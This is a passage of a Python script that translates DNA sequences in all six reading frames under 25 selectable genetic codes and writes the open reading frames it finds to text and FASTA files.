# Make an empty list called -seqs_final-, this will be the last modified sequences which will be used in the code
seqs_final=[]
# Loop through every sequence in -sequences-
for i in sequences:
# Remove every newline from every sequence, and append the result to -seqs_final-
seqs_final.append(i.replace('\n','').replace(' ',''))
# A conditional where the manual input was chosen
if choice=='2':
names=[]
sequences=[]
seqs_final=[]
# We create something called -seqcounter- which will help us if the user didn't want to put a sequence name
seqcounter=1
# As long as the loop continues, the user can put as many sequences as he wants
while True:
# Input the name of the sequences
name=input('\nInput your sequence name or header (If you skip this, it will be named >Sequence number): ')
# If the user decided not to give it a name, it will be named >Sequence n, n for the value in seqcounter
if name=='':
name='>Sequence '+str(seqcounter)
# If the program didn't find the starter tag, it adds it automatically
if re.search(r'^>',name)==None:
name='>'+name
# Another loop to check for errors in the entered DNA sequence, I used here a special technique to solve the pasta problem
while True:
print('\nInput your DNA sequence for '+name+':')
seq=''
while True:
line=input('')
seq+=line
if line=='':
break
# If the user didn't enter a sequence, an error message will be printed
invalid=re.search(r'[^ATGCatgcnN\s]',seq)
if seq=='':
print("Error: You didn't enter a sequence!")
# If we found any character other than ATGC,atgc and N, an error message will be printed
elif invalid:
print('Error: Your DNA sequence has invalid characters at position '+str(invalid.start()+1))
# If all is ok, break the loop
else:
break
# Append the name to -names-
names.append(name)
# Append the sequence to -sequences-
sequences.append(seq)
# We now ask if the user wants to add more sequences
while True:
choicemaker=input('''\nDo you wish to enter more sequences?
1: Yes
2: No
''')
# We do the usual error handling here
if choicemaker not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
else:
break
# If we choose 1, -seqcounter- will be increased by one, so for example the second sequence will be >Sequence 2 if the user didn't choose a name
if choicemaker=='1':
seqcounter+=1
# If he chose 2, break the loop
elif choicemaker=='2':
break
# Loop through the manually entered sequences
for i in sequences:
# Remove all newlines and spaces
seqs_final.append(i.replace('\n','').replace(' ','').upper())
# Choose the genetic code number and assign it to -genetic_code_num-
while True:
genetic_code_num=input('''\nPlease choose your genetic code number:
1: Standard Code
2: Vertebrate Mitochondrial Code
3: Yeast Mitochondrial Code
4: Mold, Protozoan, and Coelenterate Mitochondrial Code and Mycoplasma/Spiroplasma Code
5: Invertebrate Mitochondrial Code
6: Ciliate, Dasycladacean and Hexamita Nuclear Code
7: Echinoderm and Flatworm Mitochondrial Code
8: Euplotid Nuclear Code
9: Bacterial, Archaeal and Plant Plastid Code
10: Alternative Yeast Nuclear Code
11: Ascidian Mitochondrial Code
12: Alternative Flatworm Mitochondrial Code
13: Chlorophycean Mitochondrial Code
14: Trematode Mitochondrial Code
15: Scenedesmus obliquus Mitochondrial Code
16: Thraustochytrium Mitochondrial Code
17: Pterobranchia Mitochondrial Code
18: Candidate Division SR1 and Gracilibacteria Code
19: Pachysolen tannophilus Nuclear Code
20: Karyorelict Nuclear Code
21: Condylostoma Nuclear Code
22: Mesodinium Nuclear Code
23: Peritrich Nuclear Code
24: Blastocrithidia Nuclear Code
25: Cephalodiscidae Mitochondrial UAA-Tyr Code
''')
# An error statement if user didn't choose anything
if genetic_code_num=='':
print("Error: You didn't choose a specific code!")
# An error statement when user puts anything other than a number or a number different than the choices
elif re.search(r'^[1-9]$|^1[0-9]$|^2[0-5]$',genetic_code_num)==None:
print("\nError: Your entry isn't from the choices above!")
else:
break
# Input the number of the minimum ORF size
while True:
n=input('\nPlease enter the minimum ORF length (you can skip this, it will be set automatically to 100 base pairs): ')
# Set to 100 if -n- is ''
if n=='':
n=100
break
# If it has a value, but it's not a number, we validate that by regex pattern and print an error and exit the program
elif re.search(r'\D',n):
print("Error: You didn't enter a valid number!")
# If everything is good, we make -n- an integer to use later on
else:
n=int(n)
break
# We make the user choose between three lettered amino acids and one lettered amino acids
while True:
letterchoice=input('''\nHow would you like to view the amino acids?
1: One letter amino acids
2: Three letters amino acids
''')
# Same error handling
if letterchoice=='':
print("Error: You didn't choose an amino acid view!")
elif letterchoice not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
else:
break
# Those are the dictionaries of the codes and the three letters to one letter amino acid dictionary
# End of dictionaries is at line 749
standard={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
vertebrate_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|AG(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
yeast_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)|CT(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
mo_pro_co_mito_myco_spiro={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'AGC|AGT',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'AGA|AGG',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
invertebrate_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'AG(A|G|T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)',
'Ile':r'AT(T|C)',
'Met':r'AT(A|G)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
cil_das_hexamita={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'TA(A|G)|CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
echino_flat={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C|A)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
euplotid_nuclear={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C|A)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
bact_arch_plnt_plst={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
alt_yeast_nuc={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)|CTG',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
ascid_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)|AG(A|G)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
alter_flat_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C|A)',
'Ter':r'TAG',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
chl_phy_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)|TAG',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TAA|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
trema_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(A|G)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
scen_obliq={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)|TAG',
'Ser':r'TC(G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'T(C|A|G)A',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
thraus_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TTG|CT(A|T|C|G)',
'Ser':r'TC(G|T|C|A)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'T(A|T|G)A|TAG',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
ptero_branc_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(G|T|C|A)|AG(T|C|A)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)|AGG',
'_X_':r'N'}
candi_divis_gracil={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)|TGA',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
pachy_tanno={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)|CTG',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
karyorelict={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(G|A)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'(T|C)A(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
condylostoma={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'(T|C)A(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
mesodinium={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(A|G|T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
peritrich={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'(G|T)A(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
blastocrithidia={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'(T|G)A(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
cephalo_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(A|T|C)',
'Tyr':r'TA(T|C|A)',
'Ter':r'TAG',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)|AGG',
'_X_':r'N'}
replacement={'Val':'V',
'Ala':'A',
'Asp':'D',
'Glu':'E',
'Gly':'G',
'Phe':'F',
'Leu':'L',
'Ser':'S',
'Tyr':'Y',
'Cys':'C',
'Trp':'W',
'Pro':'P',
'His':'H',
'Gln':'Q',
'Arg':'R',
'Ile':'I',
'Met':'M',
'Thr':'T',
'Asn':'N',
'Lys':'K',
'_X_':'X'}
# A list of all the dictionaries
genetics=[standard,vertebrate_mitochondria,yeast_mitochondria,mo_pro_co_mito_myco_spiro,invertebrate_mitochondria,cil_das_hexamita,echino_flat,euplotid_nuclear,bact_arch_plnt_plst,alt_yeast_nuc,ascid_mito,alter_flat_mito,chl_phy_mito,trema_mito,scen_obliq,thraus_mito,ptero_branc_mito,candi_divis_gracil,pachy_tanno,karyorelict,condylostoma,mesodinium,peritrich,blastocrithidia,cephalo_mito]
# We make the selected codon as an index in the dictionaries list, and we assign it to -aa_aacodons-
aa_aacodons=genetics[int(genetic_code_num)-1]
# We create the file 'completeframes.txt' to write the final result
completeframes=open('completeframes.txt','w')
# We create 6 fasta files called orf_frame_n.fasta to write the DNA, mRNA and protein sequences of all frames in all sequences
orf_fasta1=open('orf_frame_1.fasta','w')
orf_fasta2=open('orf_frame_2.fasta','w')
orf_fasta3=open('orf_frame_3.fasta','w')
orf_fasta_r1=open('orf_frame_-1.fasta','w')
orf_fasta_r2=open('orf_frame_-2.fasta','w')
orf_fasta_r3=open('orf_frame_-3.fasta','w')
# We now define a function which will translate all 6 frames completely
def translate(dna, codes, n):
    """Translate one full reading frame of *dna*.

    *codes* maps three-letter residue names to codon regexes and *n*
    (0, 1 or 2) is the frame offset.  Every pattern that matches a codon
    appends its residue name, in the dictionary's iteration order.
    """
    protein = ''
    for pos in range(0, len(dna), 3):
        codon = dna[pos + n:pos + n + 3]
        for residue, pattern in codes.items():
            if re.search(pattern, codon):
                protein += residue
    return protein
# We now make a function to search for the open reading frames in all the reading frames
def orf_f(rf,cutoff):
    """Find ORFs on the forward strand inside translated frame *rf*.

    Returns [report_text, fasta_text].  Reads the module globals dna_f,
    nameofseq, letterchoice and replacement, so it must be called from the
    main per-sequence loop below.
    """
    orffound=''
    fastawriter=''
    # 'Met' up to the nearest 'Ter' (non-greedy), or 'Met' to the end of the
    # frame when the ORF runs off the strand without a stop codon.
    x=re.finditer(r'Met.*?Ter|Met.*',rf)
    for i in x:
        # Keep only matches at least *cutoff* characters long (length of the
        # three-letter translation string, stop included).
        if len(i.group())>=cutoff:
            final=''
            # The reported protein excludes the stop codon.
            prefinal=re.sub(r'Ter','',i.group())
            for j in range(0,len(prefinal),3):
                # letterchoice '1': one-letter codes via the replacement map.
                if letterchoice=='1':
                    for three, one in replacement.items():
                        if re.search(three,prefinal[j:j+3]):
                            final+=one
                # letterchoice '2': keep the three-letter codes as-is.
                elif letterchoice=='2':
                    final+=prefinal[j:j+3]
            # Frames are 'X'-padded to DNA coordinates, so i.start()/i.end()
            # index directly into dna_f for positions and lengths.
            orffound+=dna_f[i.start():i.end()]+'\n'+"It's found in locations "+str(i.start()+1)+' to '+str(i.end())+'\n'+'Its length is '+str(len(dna_f[i.start():i.end()]))+'\n'+'Protein translated: '+final+'\n'+'Its length is: '+str(int(len(prefinal)/3))+'\n\n'
            fastawriter+=nameofseq+' (open reading frame sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+dna_f[i.start():i.end()]+'\n\n'+nameofseq+' (mRNA sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+dna_f[i.start():i.end()].replace('T','U')+'\n\n'+nameofseq+' (protein sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+final+'\n\n'
    return [orffound,fastawriter]
# A function for the reverse strand that has the same function like the one before it, we change in the location numbers because it is the reverse strand
def orf_r(rf,cutoff):
    """Find ORFs on the reverse-complement strand inside frame *rf*.

    Same contract as orf_f, but positions are reported in forward-strand
    coordinates (len(dna_f)-i.start() down to len(dna_f)-i.end()+1) and the
    sequence text comes from the global dna_r.
    """
    orffound=''
    fastawriter=''
    x=re.finditer(r'Met.*?Ter|Met.*',rf)
    for i in x:
        if len(i.group())>=cutoff:
            final=''
            prefinal=re.sub(r'Ter','',i.group())
            for j in range(0,len(prefinal),3):
                if letterchoice=='1':
                    for three, one in replacement.items():
                        if re.search(three,prefinal[j:j+3]):
                            final+=one
                elif letterchoice=='2':
                    final+=prefinal[j:j+3]
            orffound+=dna_r[i.start():i.end()]+'\n'+"It's found in locations "+str(len(dna_f)-i.start())+' to '+str(len(dna_f)-i.end()+1)+'\n'+'Its length is '+str(len(dna_r[i.start():i.end()]))+'\n'+'Protein translated: '+final+'\n'+'Its length is: '+str(int(len(prefinal)/3))+'\n\n'
            fastawriter+=nameofseq+' (open reading frame sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')'+'\n'+dna_r[i.start():i.end()]+'\n\n'+nameofseq+' (mRNA sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')''\n'+dna_r[i.start():i.end()].replace('T','U')+'\n\n'+nameofseq+' (protein sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')'+'\n'+final+'\n\n'
    return [orffound,fastawriter]
# Main driver: translate all six frames of every input sequence and write the
# ORF report (completeframes.txt) plus the six per-frame FASTA files.
for i in range(0,len(seqs_final)):
    # Header for this sequence; orf_f/orf_r read nameofseq as a global.
    nameofseq=names[i]
    completeframes.write(nameofseq+'\n')
    dna_f=(seqs_final[i])
    # Reverse complement, so start/stop codons read 5'->3' on both strands.
